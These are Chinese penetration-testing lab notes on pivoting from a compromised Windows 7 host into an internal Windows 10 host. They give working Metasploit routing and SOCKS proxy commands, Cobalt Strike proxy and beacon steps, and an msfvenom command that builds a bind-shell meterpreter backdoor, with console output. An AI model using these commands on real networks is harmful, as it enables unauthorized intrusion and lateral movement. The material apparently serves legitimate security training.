小迪安全网络架构图:
背景:当前获取window7 出网主机的shell。
1.使用msf上线,查看路由
run autoroute -p
添加路由:
run post/multi/manage/autoroute
使用socks模块开启节点,作为流量跳板
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 1122
srvport => 1122
msf6 auxiliary(server/socks_proxy) > run
使用socket cap 进行代理
2.使用cs进行渗透测试
windwos7上线cs木马
点击代理转发选择socket
输入账户密码后,使用proifixer进行流量转发
配置为目标站点走socket5
3.使用cs进行windows10 上线cs
方案:创建木马将数据传递给本地4444端口
使用window7正向连接目标4444端口
cs配置正向监听器:
生成木马:
模拟执行木马,在windows7交互会话窗口:
connect 192.168.11.129 4444 即可上线
4.使用msf进行windows10 上线
生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe
放置windows10上运行
msf执行:
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 192.168.11.129
rhost => 192.168.11.129
msf6 exploit(multi/handler) > set lport 2222
lport => 2222
msf6 exploit(multi/handler) > run